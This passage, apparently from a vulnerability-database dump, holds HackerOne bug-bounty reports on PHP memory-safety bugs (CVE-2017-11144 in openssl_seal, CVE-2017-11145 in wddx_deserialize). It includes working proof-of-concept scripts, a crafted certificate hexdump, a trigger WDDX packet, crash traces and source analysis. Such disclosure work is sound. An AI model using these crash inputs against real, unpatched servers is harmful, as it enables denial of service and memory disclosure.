addresses multiple vulnerabilities: \n \nCVE-2017-11142: In PHP before 5.6.31, 7.x before 7.0.17, and 7.1.x before 7.1.3, remote attackers could cause a CPU consumption denial of service attack by injecting long form variables, related to main/php_variables.c.", "modified": "2017-09-13T18:59:00", "published": "2017-09-13T18:59:00", "id": "TENABLE:1C269594C0F743E3C1491FA7B7821769", "href": "http://www.tenable.com/security/tns-2017-12", "type": "tenable", "title": "[R1] SecurityCenter 5.3.2, 5.4.0, 5.4.2, 5.4.5, 5.5.0, and 5.5.1 Fixes Multiple Vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2019-10-23T18:01:36", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-11144"], "description": "### Description:\nA wild memcpy is discovered in the openssl package included in stable PHP release. During parsing a PEM certificate in openssl_seal(), an invalid key length is produced after parsing, eskl[0] value is -1 after the call to EVP_SealInit(), subsequently causing a heap overflow via a wild memcpy.\n\n### Impact:\nAffects both PHP 5 before 5.6.31 ([ChangeLog](http://php.net/ChangeLog-5.php)) and PHP 7 before 7.1.7 ([ChangeLog](http://php.net/ChangeLog-7.php)).\nResolved PHP [bug report](https://bugs.php.net/bug.php?id=74651), will update the pending CVE.\n\n### Exploitability:\nPoC provides immediate DoS of the HTTP server; potential code execution requires setting up a malicious external certificate, depending on the actual exploitability of the wild memcpy. We will update again if we have built a different PoC.\n\n### Repro:\n```\n<?php \n$argc = $_SERVER['argc'];\n$argv = $_SERVER['argv'];\n\n$dir_str = dirname(__FILE__);\n$file_str = ($dir_str).\"/\".$argv[1];\necho \"Input file: \".$file_str.\"\\n\";\n\nif(!extension_loaded('openssl')) print \"openssl not loaded.\\n\";\n\n$inputstr = file_get_contents($file_str);\nprint strlen($inputstr) . \" bytes read.\\n\";\n\n$pub_key_id = openssl_get_publickey($inputstr);\nvar_dump($pub_key_id);\n\nopenssl_seal($inputstr, $sealed, $ekeys, array($pub_key_id, $pub_key_id), 'AES-128-ECB');\n\nvar_dump($sealed);\t\n?>\n$ uname -a\nLinux CSLB16U 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\n\n$ ./i686-pc-linux-gnu-php --version\nPHP 7.1.5 (cli) (built: May 25 2017 16:35:37) ( NTS )\nCopyright (c) 1997-2017 The PHP Group\nZend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies\n\n$ xxd -g 1 repro.pem \n00000000: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 -----BEGIN CERTI\n00000010: 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 4d 49 49 45 FICATE-----.MIIE\n00000020: 6f 44 43 43 42 41 6d 67 41 77 49 42 41 67 49 42 oDCCBAmgAwIBAgIB\n00000030: 4a 7a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 JzANBgkqhkiG9w0B\n00000040: 41 51 51 46 41 44 43 42 6b 44 45 4c 4d 41 6b 47 AQQFADCBkDELMAkG\n00000050: 41 31 55 45 46 68 4d 43 55 6b 38 78 0a 45 44 41 A1UEFhMCUk8x.EDA\n00000060: 4f 42 67 4e 56 42 41 67 54 42 31 4a 76 62 57 46 OBgNVBAgTB1JvbWF\n00000070: 75 61 57 45 78 45 44 41 4f 42 67 4e 56 42 41 63 uaWExEDAOBgNVBAc\n00000080: 54 42 30 4e 79 59 57 6c 76 64 6d 45 78 44 7a 41 TB0NyYWlvdmExDzA\n00000090: 4e 42 67 4e 56 42 41 6f 54 42 6c 4e 6c 0a 63 6d NBgNVBAoTBlNl.cm\n000000a0: 64 70 64 54 45 54 4d 42 45 47 41 31 55 45 43 78 dpdTETMBEGA1UECx\n000000b0: 4d 4b 55 32 56 79 5a 32 6c 31 49 46 4e 53 54 44 MKU2VyZ2l1IFNSTD\n000000c0: 45 53 4d 42 41 47 41 31 55 45 41 78 4d 4a 55 32 ESMBAGA1UEAxMJU2\n000000d0: 56 79 5a 32 6c 31 49 45 4e 42 4d 53 4d 77 0a 49 VyZ2l1IENBMSMw.I\n000000e0: 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 6b 42 46 QYJKoZIhvcNAQkBF\n000000f0: 68 52 75 58 33 4e 6c 63 6d 64 70 64 55 42 6f 62 hRuX3NlcmdpdUBob\n00000100: 33 52 74 59 57 6c 73 4c 6d 4e 76 62 54 41 65 46 3RtYWlsLmNvbTAeF\n00000110: 77 30 77 4e 44 41 31 4d 54 51 78 4d 7a 4d 30 0a w0wNDA1MTQxMzM0.\n00000120: 4e 54 5a 61 46 77 30 77 4e 54 41 31 4d 54 51 78 NTZaFw0wNTA1MTQx\n00000130: 4d 7a 4d 30 4e 54 5a 61 4d 49 47 61 4d 51 73 77 MzM0NTZaMIGaMQsw\n00000140: 43 51 59 44 56 51 51 47 45 77 4a 53 54 7a 45 51 CQYDVQQGEwJSTzEQ\n00000150: 4d 41 34 47 41 31 55 45 43 42 4d 48 55 6d 39 74 MA4GA1UECBMHUm9t\n00000160: 0a 59 57 35 70 59 54 45 51 4d 41 34 47 41 31 55 .YW5pYTEQMA4GA1U\n00000170: 45 42 78 4d 48 51 33 4a 68 61 57 39 32 59 54 45 EBxMHQ3JhaW92YTE\n00000180: 54 4d 42 45 47 41 31 55 45 43 68 4d 4b 55 32 56 TMBEGA1UEChMKU2V\n00000190: 79 5a 32 6c 31 49 46 4e 53 54 44 45 54 4d 42 45 yZ2l1IFNSTDETMBE\n000001a0: 47 0a 41 31 55 45 43 78 4d 4b 55 32 56 79 5a 32 G.A1UECxMKU2VyZ2\n000001b0: 6c 31 49 46 4e 53 54 44 45 59 4d 42 59 47 41 31 l1IFNSTDEYMBYGA1\n000001c0: 55 45 41 78 4d 50 55 32 56 79 5a 32 6c 31 49 48 UEAxMPU2VyZ2l1IH\n000001d0: 42 6c 63 6e 4e 76 62 6d 46 73 4d 53 4d 77 49 51 BlcnNvbmFsMSMwIQ\n000001e0: 59 4a 0a 4b 6f 5a 49 68 76 63 4e 41 51 6b 42 46 YJ.KoZIhvcNAQkBF\n000001f0: 68 52 75 58 33 4e 6c 63 6d 64 70 64 55 42 6f 62 hRuX3NlcmdpdUBob\n00000200: 33 52 74 59 57 6c 73 4c 6d 4e 76 62 54 43 42 6e 3RtYWlsLmNvbTCBn\n00000210: 7a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 zANBgkqhkiG9w0BA\n00000220: 51 45 46 0a 41 41 4f 42 6a 51 41 77 67 59 6b 43 QEF.AAOBjQAwgYkC\n00000230: 67 59 45 41 70 4e 6a 37 58 58 7a 38 54 38 46 63 gYEApNj7XXz8T8Fc\n00000240: 4c 49 57 70 42 6e 69 50 59 6f 6d 33 51 63 54 36 LIWpBniPYom3QcT6\n00000250: 54 37 75 30 78 52 50 48 71 74 71 7a 6a 35 6f 62 T7u0xRPHqtqzj5ob\n00000260: 6f 42 59 70 0a 44 4a 65 35 64 33 35 34 2f 79 30 oBYp.DJe5d354/y0\n00000270: 67 4a 54 70 69 4c 74 38 2b 66 54 72 50 67 57 58 gJTpiLt8+fTrPgWX\n00000280: 6e 62 48 6d 33 70 4f 48 67 58 7a 54 63 58 36 41 nbHm3pOHgXzTcX6A\n00000290: 72 61 6e 69 30 47 44 55 30 2f 78 44 69 34 56 6b rani0GDU0/xDi4Vk\n000002a0: 43 52 47 63 53 0a 59 71 58 32 73 4a 70 63 44 7a CRGcS.YqX2sJpcDz\n000002b0: 41 62 6d 4b 39 55 44 4d 74 33 78 66 2f 4f 31 42 AbmK9UDMt3xf/O1B\n000002c0: 38 41 4a 61 6e 33 52 66 4f 30 42 6d 33 6f 7a 54 8AJan3RfO0Bm3ozT\n000002d0: 45 50 7a 69 4c 4d 6b 6d 73 69 59 72 35 62 2f 4c EPziLMkmsiYr5b/L\n000002e0: 34 43 41 77 45 41 0a 41 61 4f 43 41 66 77 77 67 4CAwEA.AaOCAfwwg\n000002f0: 67 48 34 4d 41 6b 47 41 31 55 64 45 77 51 43 4d gH4MAkGA1UdEwQCM\n00000300: 41 41 77 4e 51 59 4a 59 49 5a 49 41 59 62 34 51 AAwNQYJYIZIAYb4Q\n00000310: 67 45 4e 42 43 67 57 4a 6b 5a 76 63 69 42 48 63 gENBCgWJkZvciBHc\n00000320: 6d 6c 6b 49 48 56 7a 0a 5a 53 42 76 62 6d 78 35 mlkIHVz.ZSBvbmx5\n00000330: 4f 79 42 79 5a 58 46 31 5a 58 4e 30 49 48 52 68 OyByZXF1ZXN0IHRh\n00000340: 5a 79 42 31 63 32 56 79 56 47 46 6e 4d 42 45 47 ZyB1c2VyVGFnMBEG\n00000350: 43 57 43 47 53 41 47 47 2b 45 49 42 41 51 51 45 CWCGSAGG+EIBAQQE\n00000360: 41 77 49 46 34 44 41 2f 0a 42 67 4e 56 48 52 38 AwIF4DA/.BgNVHR8\n00000370: 45 4f 44 41 32 4d 44 53 67 4d 71 41 77 68 69 35 EODA2MDSgMqAwhi5\n00000380: 6f 64 48 52 77 4f 69 38 76 62 57 39 69 61 57 78 odHRwOi8vbW9iaWx\n00000390: 6c 4c 6d 4a 73 64 57 55 74 63 32 39 6d 64 48 64 lLmJsdWUtc29mdHd\n000003a0: 68 63 6d 55 75 63 6d 38 36 0a 4f 54 41 76 59 32 hcmUucm86.OTAvY2\n000003b0: 45 76 59 33 4a 73 4c 6e 4e 6f 64 47 31 73 4d 44 EvY3JsLnNodG1sMD\n000003c0: 55 47 43 57 43 47 53 41 47 47 2b 45 49 42 43 41 UGCWCGSAGG+EIBCA\n000003d0: 51 6f 46 69 5a 6f 64 48 52 77 4f 69 38 76 62 57 QoFiZodHRwOi8vbW\n000003e0: 39 69 61 57 78 6c 4c 6d 4a 73 0a 64 57 55 74 63 9iaWxlLmJs.dWUtc\n000003f0: 32 39 6d 64 48 64 68 63 6d 55 75 63 6d 38 36 4f 29mdHdhcmUucm86O\n00000400: 54 41 76 63 48 56 69 4c 7a 41 68 42 67 4e 56 48 TAvcHViLzAhBgNVH\n00000410: 52 45 45 47 6a 41 59 67 52 5a 7a 5a 58 4a 6e 61 REEGjAYgRZzZXJna\n00000420: 58 56 41 59 6d 78 31 5a 58 4e 76 0a 5a 6e 52 33 XVAYmx1ZXNv.ZnR3\n00000430: 59 58 4a 6c 4c 6e 4a 76 4d 42 30 47 41 31 55 64 YXJlLnJvMB0GA1Ud\n00000440: 44 67 51 57 42 42 53 77 70 2f 2f 35 51 52 58 65 DgQWBBSwp//5QRXe\n00000450: 49 7a 6d 39 33 54 45 50 6c 36 43 79 6f 6e 54 67 Izm93TEPl6CyonTg\n00000460: 2f 44 43 42 70 77 59 44 56 52 30 6a 0a 42 49 47 /DCBpwYDVR0j.BIG\n00000470: 66 4d 49 47 63 6f 59 47 57 70 49 47 54 4d 49 47 fMIGcoYGWpIGTMIG\n00000480: 51 4d 51 73 77 43 51 59 44 56 51 51 47 45 77 4a QMQswCQYDVQQGEwJ\n00000490: 53 54 7a 45 51 4d 41 34 47 41 31 55 45 43 42 4d STzEQMA4GA1UECBM\n000004a0: 48 55 6d 39 74 59 57 35 70 59 54 45 51 0a 4d 41 HUm9tYW5pYTEQ.MA\n000004b0: 34 47 41 31 55 45 42 78 4d 48 51 33 4a 68 61 57 4GA1UEBxMHQ3JhaW\n000004c0: 39 32 59 54 45 50 4d 41 30 47 41 31 55 45 43 68 92YTEPMA0GA1UECh\n000004d0: 4d 47 55 32 56 79 5a 32 6c 31 4d 52 4d 77 45 51 MGU2VyZ2l1MRMwEQ\n000004e0: 59 44 56 51 51 4c 45 77 70 54 5a 58 4a 6e 0a 61 YDVQQLEwpTZXJn.a\n000004f0: 58 55 67 55 31 4a 4d 4d 52 49 77 45 41 59 44 56 XUgU1JMMRIwEAYDV\n00000500: 51 51 44 45 77 6c 54 5a 58 4a 6e 61 58 55 67 51 QQDEwlTZXJnaXUgQ\n00000510: 30 45 78 49 7a 41 68 42 67 6b 71 68 6b 69 47 39 0ExIzAhBgkqhkiG9\n00000520: 77 30 42 43 51 45 57 46 47 35 66 63 32 56 79 0a w0BCQEWFG5fc2Vy.\n00000530: 5a 32 6c 31 51 47 68 76 64 47 31 68 61 57 77 75 Z2l1QGhvdG1haWwu\n00000540: 59 32 39 74 67 67 45 41 4d 41 73 47 41 31 55 64 Y29tggEAMAsGA1Ud\n00000550: 44 77 51 45 41 77 49 45 38 44 41 6a 42 67 6c 67 DwQEAwIE8DAjBglg\n00000560: 68 6b 67 42 68 76 68 43 41 51 49 45 46 68 59 55 hkgBhvhCAQIEFhYU\n00000570: 0a 61 48 52 30 63 44 6f 76 4c 7a 59 79 4c 6a 49 .aHR0cDovLzYyLjI\n00000580: 7a 4d 53 34 35 4f 43 34 31 4d 69 38 77 43 77 59 zMS45OC41Mi8wCwY\n00000590: 44 4b 67 4d 45 42 41 51 2b 35 32 49 30 4d 41 30 DKgMEBAQ+52I0MA0\n000005a0: 47 43 53 71 47 53 49 62 33 44 51 45 42 42 41 55 GCSqGSIb3DQEBBAU\n000005b0: 41 0a 41 34 47 42 41 49 42 49 4f 4a 2b 69 69 4c A.A4GBAIBIOJ+iiL\n000005c0: 79 51 66 4e 4a 45 59 2b 49 4d 65 66 61 79 51 65 yQfNJEY+IMefayQe\n000005d0: 61 30 6e 6d 75 58 59 59 2b 46 2b 4c 31 44 46 6a a0nmuXYY+F+L1DFj\n000005e0: 53 43 37 78 43 68 79 74 67 59 6f 50 4e 6e 4b 6b SC7xChytgYoPNnKk\n000005f0: 68 68 0a 33 64 57 50 74 78 62 73 77 69 71 4b 59 hh.3dWPtxbswiqKY\n00000600: 55 6e 47 69 36 79 33 48 69 34 55 68 44 73 4f 61 UnGi6y3Hi4UhDsOa\n00000610: 44 57 32 39 74 32 53 33 30 35 68 53 63 32 71 67 DW29t2S305hSc2qg\n00000620: 6a 4f 69 4e 74 52 59 51 49 56 59 51 38 45 48 47 jOiNtRYQIVYQ8EHG\n00000630: 31 6b 37 0a 46 6c 36 33 53 37 75 43 4f 68 6e 56 1k7.Fl63S7uCOhnV\n00000640: 4a 74 2b 34 4d 6e 55 4b 31 4e 36 2f 70 77 67 73 Jt+4MnUK1N6/pwgs\n00000650: 70 2b 5a 32 47 76 45 73 44 47 31 71 43 4b 6e 76 p+Z2GvEsDG1qCKnv\n00000660: 4e 70 66 36 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 Npf6.-----END CE\n00000670: 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a RTIFICATE-----.\n\n$ ./i686-pc-linux-gnu-php openSSLharn.php repro.pem \nInput file: /home/sebastian/Documents/php_gdb/bin/repro.pem\n1663 bytes read.\nresource(6) of type (OpenSSL key)\n=================================================================\n==32018==ERROR: AddressSanitizer: negative-size-param: (size=-1)\n #0 0xf71fab04 in __asan_memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ab04)\n #1 0xf71fac2f in memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ac2f)\n #2 0x8cdacb6 in zend_string_init /home/sebastian/Documents/php-7.1.5/Zend/zend_string.h:160\n #3 0x8cdacb6 in add_next_index_stringl /home/sebastian/Documents/php-7.1.5/Zend/zend_API.c:1554\n #4 0x81627d2 in zif_openssl_seal /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5932\n #5 0x8e7a9b5 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:628\n #6 0x8e74c59 in execute_ex /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:429\n #7 0x8e766ef in zend_execute /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:474\n #8 0x8cc60bd in zend_execute_scripts /home/sebastian/Documents/php-7.1.5/Zend/zend.c:1476\n #9 0x8b0c6c3 in php_execute_script /home/sebastian/Documents/php-7.1.5/main/main.c:2537\n #10 0x920a0bc in do_cli /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:993\n #11 0x920cbef in main /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:1381\n #12 0xf6a89636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)\n #13 0x806a970 (/home/sebastian/Documents/php_gdb/bin/i686-pc-linux-gnu-php+0x806a970)\n\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\nSUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memcpy\n==32018==ABORTING\n```\n### Analysis:\nThe bug is due to mistakes in both OpenSSL and PHP:\n\n1) OpenSSL 1.1.0e failed to document correct behavior of the EVP_SealInit() function:\n\nEVP_SealInit() may return -1 when one of the keys has a negative length:\n\nhttps://github.com/openssl/openssl/blob/9bb6f82958537b9ab5ec8fe44c762f448d4a59d8/crypto/evp/p_seal.c\n```\n41 for (i = 0; i < npubk; i++) {\n42 ekl[i] =\n43 EVP_PKEY_encrypt_old(ek[i], key, EVP_CIPHER_CTX_key_length(ctx),\n44 pubk[i]);\n45 if (ekl[i] <= 0)\n46 return (-1);\n47 }\n48 return (npubk);\n```\nHowever the official documentation for EVP_SealInit() did not mention -1 as a return value on certain error conditions:\nhttps://www.openssl.org/docs/man1.1.0/crypto/EVP_SealInit.html\n\n2) PHP did not handle -1 as a return value of EVP_SealInit(), and failed to validate whether eksl[i] holds a proper length:\n\nIn php-7.1.5/ext/openssl/openssl.c:\n```\n5930\t\tfor (i=0; i<nkeys; i++) {\n5931\t\t\teks[i][eksl[i]] = '\\0';\n5932\t\t\tadd_next_index_stringl(ekeys, (const char*)eks[i], eksl[i]);\n5933\t\t\tefree(eks[i]);\n5934\t\t\teks[i] = NULL;\n5935\t\t}\n```\nThe eksl[0] as -1, when passed to add_next_index_stringl(), will trigger the wild memcpy.\n\nA quick fix would be adding checks for both the return value of EVP_SealInit(), and values of eksl[i].\n\nThe bug also contains a negative indexing issue at:\n`5931 eks[i][eksl[i]] = '\\0';`\n\n### In GDB:\n```\nBreakpoint 1, zif_openssl_seal (execute_data=0xf2e13270, return_value=0xffff9150) at /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5881\n5881\t\teksl = safe_emalloc(nkeys, sizeof(*eksl), 0);\n\n(gdb) n\n5882\t\teks = safe_emalloc(nkeys, sizeof(*eks), 0);\n\n(gdb) x/10bx eksl\n0xf2e6b010:\t0x18\t0xb0\t0xe6\t0xf2\t0x00\t0x00\t0x00\t0x00\n0xf2e6b018:\t0x20\t0xb0\n\n(gdb) watch eksl[0]\nHardware watchpoint 2: eksl[0]\n(gdb) c\nContinuing.\n\nHardware watchpoint 2: eksl[0]\n\nOld value = -219762664\nNew value = -1\n0xf763288d in EVP_SealInit () from /usr/local/lib/libcrypto.so.1.1\n(gdb) bt\n#0 0xf763288d in EVP_SealInit () from /usr/local/lib/libcrypto.so.1.1\n#1 0x08161ec3 in zif_openssl_seal (execute_data=0xf2e13270, return_value=0xffff9150) at /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5913\n#2 0x08e7a9b6 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:628\n#3 0x08e74c5a in execute_ex (ex=0xf2e13020) at /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:429\n#4 0x08e766f0 in zend_execute (op_array=0xf2e68200, return_value=0x0) at /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:474\n#5 0x08cc60be in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/sebastian/Documents/php-7.1.5/Zend/zend.c:1476\n#6 0x08b0c6c4 in php_execute_script (primary_file=0xffffbc10) at /home/sebastian/Documents/php-7.1.5/main/main.c:2537\n#7 0x0920a0bd in do_cli (argc=3, argv=0xf4000670) at /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:993\n#8 0x0920cbf0 in main (argc=3, argv=0xf4000670) at /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:1381\n```\neksl[0] as -1 when passed into add_next_index_stringl() would cause the wild copy:\n```\n5930 for (i=0; i<nkeys; i++) {\n5931 eks[i][eksl[i]] = '\\0';\n5932 add_next_index_stringl(ekeys, (const char*)eks[i], eksl[i]);\n5933 efree(eks[i]);\n5934 eks[i] = NULL;\n5935 }\n```\nContinuing.\n```\n=================================================================\n==26054==ERROR: AddressSanitizer: negative-size-param: (size=-1)\n #0 0xf7ae5b04 in __asan_memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ab04)\n #1 0xf7ae5c2f in memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ac2f)\n #2 0x8cdacb6 in zend_string_init /home/sebastian/Documents/php-7.1.5/Zend/zend_string.h:160\n #3 0x8cdacb6 in add_next_index_stringl /home/sebastian/Documents/php-7.1.5/Zend/zend_API.c:1554\n #4 0x81627d2 in zif_openssl_seal /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5932\n #5 0x8e7a9b5 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:628\n #6 0x8e74c59 in execute_ex /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:429\n #7 0x8e766ef in zend_execute /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:474\n #8 0x8cc60bd in zend_execute_scripts /home/sebastian/Documents/php-7.1.5/Zend/zend.c:1476\n #9 0x8b0c6c3 in php_execute_script /home/sebastian/Documents/php-7.1.5/main/main.c:2537\n #10 0x920a0bc in do_cli /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:993\n #11 0x920cbef in main /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:1381\n #12 0xf7374636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)\n #13 0x806a970 (/home/sebastian/Documents/php_gdb/bin/i686-pc-linux-gnu-php+0x806a970)\n\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\nSUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memcpy\n==26054==ABORTING\n```\n\n\n", "modified": "2019-10-14T04:39:39", "published": "2017-07-12T09:52:49", "id": "H1:248609", "href": "https://hackerone.com/reports/248609", "type": "hackerone", "title": "PHP (IBB): PHP OpenSSL zif_openssl_seal() heap overflow (wild memcpy)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-23T18:01:36", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-11145"], "description": "###Description:\nWhile deserializing an invalid dateTime value, wddx_deserialize() would result in a heap out-of-bounds read in timelib_meridian(). As wddx_deserialize() is exposed to network data, and sometimes echo the results back to client, this issue could potentially allow remote peeking of the process memory. It should also affect other PHP APIs that make use of timelib_meridian().\n\n###Impact:\nAffects both PHP 5 before 5.6.31 ([ChangeLog](http://php.net/ChangeLog-5.php)) and PHP 7 before 7.1.7 ([ChangeLog](http://php.net/ChangeLog-7.php)).\nResolved PHP [bug report](https://bugs.php.net/bug.php?id=74819), will update the pending CVE.\n\n###Reproduce:\nReproduced on both php-7.1.6 and php-5.6.30, tested on 32-bit builds, with ASAN enabled and USE_ZEND_ALLOC set to 0.\n\nConfiguration:\n```\nCC=\"`which gcc`\" CFLAGS=\"-O0 -g -fsanitize=address\" ./configure --prefix=\"`pwd`/../php7_wddx\" --disable-shared --enable-wddx\n```\n\nThe trigger wddx packet:\n```\n$ cat repro.wddx \n<?xml version='1.0'?>\n<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>\n<wddxPacket version='1.0'>\n<header/>\n\t<data>\n \t<struct>\n <var name='aDateTime'>\n <dateTime>I06.00am 0</dateTime>\n </var>\n </struct>\n\t</data>\n</wddxPacket>\n```\nPHP script:\n```\n$ cat wddx.php \n<?php\n$argc = $_SERVER['argc'];\n$argv = $_SERVER['argv'];\n\n$dir_str = dirname(__FILE__);\n$file_str = ($dir_str).\"/\".$argv[1];\n\nif (!extension_loaded('wddx')) print \"wddx not loaded.\\n\";\n\n$wddx_str = file_get_contents($file_str);\nprint strlen($wddx_str) . \" bytes read.\\n\";\nvar_dump(wddx_deserialize($wddx_str));\n?>\n```\nOutput:\n```\n$ export USE_ZEND_ALLOC=0\n\n$ ../../php7_wddx/bin/php wddx.php repro.wddx \n307 bytes read.\n=================================================================\n==13293== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb57057fa at pc 0x809b0f4 bp 0xbfb9c788 sp 0xbfb9c77c\nREAD of size 1 at 0xb57057fa thread T0\n #0 0x809b0f3 in timelib_meridian /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:410\n #1 0x80af10b in scan /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:5230\n #2 0x80f3822 in timelib_strtotime /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:24098\n #3 0x806afbd in php_parse_date /home/weilei/php-7.1.6/ext/date/php_date.c:1455\n #4 0x8a2fea7 in php_wddx_process_data /home/weilei/php-7.1.6/ext/wddx/wddx.c:1075\n #5 0x8a4489a in _cdata_handler /home/weilei/php-7.1.6/ext/xml/compat.c:265\n #6 0xb5d0a6b5 in xmlParseCharData__internal_alias /home/weilei/libxml2/parser.c:4597\n #7 0xb5d5c9be in xmlParseTryOrFinish /home/weilei/libxml2/parser.c:11715\n #8 0xb5d64462 in xmlParseChunk__internal_alias /home/weilei/libxml2/parser.c:12454\n #9 0x8a46705 in php_XML_Parse /home/weilei/php-7.1.6/ext/xml/compat.c:600\n #10 0x8a30293 in php_wddx_deserialize_ex /home/weilei/php-7.1.6/ext/wddx/wddx.c:1109\n #11 0x8a32cb3 in zif_wddx_deserialize /home/weilei/php-7.1.6/ext/wddx/wddx.c:1327\n #12 0x8de0fb6 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/weilei/php-7.1.6/Zend/zend_vm_execute.h:675\n #13 0x8ddb38a in execute_ex /home/weilei/php-7.1.6/Zend/zend_vm_execute.h:429\n #14 0x8ddcaf0 in zend_execute /home/weilei/php-7.1.6/Zend/zend_vm_execute.h:474\n #15 0x8c35c00 in zend_execute_scripts /home/weilei/php-7.1.6/Zend/zend.c:1476\n #16 0x8a634e4 in php_execute_script /home/weilei/php-7.1.6/main/main.c:2537\n #17 0x90f9d1b in do_cli /home/weilei/php-7.1.6/sapi/cli/php_cli.c:993\n #18 0x90fc5f6 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1381\n #19 0xb5b03a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\n #20 0x8065200 in _start (/home/weilei/php7_wddx/bin/php+0x8065200)\n0xb57057fa is located 0 bytes to the right of 10-byte region [0xb57057f0,0xb57057fa)\nallocated by thread T0 here:\n #0 0xb61b2854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)\n #1 0x8b76d40 in __zend_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2820\n #2 0x8b73e5f in _emalloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2413\n #3 0x8b74aaa in _safe_emalloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2472\n #4 0x8b75005 in _ecalloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2495\n #5 0x809b85c in timelib_string /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:460\n #6 0x80ae9dd in scan /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:5214\n #7 0x80f3822 in timelib_strtotime /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:24098\n #8 0x806afbd in php_parse_date /home/weilei/php-7.1.6/ext/date/php_date.c:1455\n #9 0x8a2fea7 in php_wddx_process_data /home/weilei/php-7.1.6/ext/wddx/wddx.c:1075\n #10 0x8a4489a in _cdata_handler /home/weilei/php-7.1.6/ext/xml/compat.c:265\n #11 0xb5d0a6b5 in xmlParseCharData__internal_alias /home/weilei/libxml2/parser.c:4597\n #12 0xb5d5c9be in xmlParseTryOrFinish /home/weilei/libxml2/parser.c:11715\n #13 0xb5d64462 in xmlParseChunk__internal_alias /home/weilei/libxml2/parser.c:12454\n #14 0x8a46705 in php_XML_Parse /home/weilei/php-7.1.6/ext/xml/compat.c:600\n #15 0x8a30293 in php_wddx_deserialize_ex /home/weilei/php-7.1.6/ext/wddx/wddx.c:1109\n #16 0x8a32cb3 in zif_wddx_deserialize /home/weilei/php-7.1.6/ext/wddx/wddx.c:1327\n #17 0x8de0fb6 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/weilei/php-7.1.6/Zend/zend_vm_execute.h:675\n #18 0x8ddb38a in execute_ex /home/weilei/php-7.1.6/Zend/zend_vm_execute.h:429\n #19 0x8ddcaf0 in zend_execute /home/weilei/php-7.1.6/Zend/zend_vm_execute.h:474\n #20 0x8c35c00 in zend_execute_scripts /home/weilei/php-7.1.6/Zend/zend.c:1476\n #21 0x8a634e4 in php_execute_script /home/weilei/php-7.1.6/main/main.c:2537\n #22 0x90f9d1b in do_cli /home/weilei/php-7.1.6/sapi/cli/php_cli.c:993\n #23 0x90fc5f6 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1381\n #24 0xb5b03a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/weilei/php-7.1.6/ext/date/lib/parse_date.c:410 timelib_meridian\nShadow bytes around the buggy address:\n 0x36ae0aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 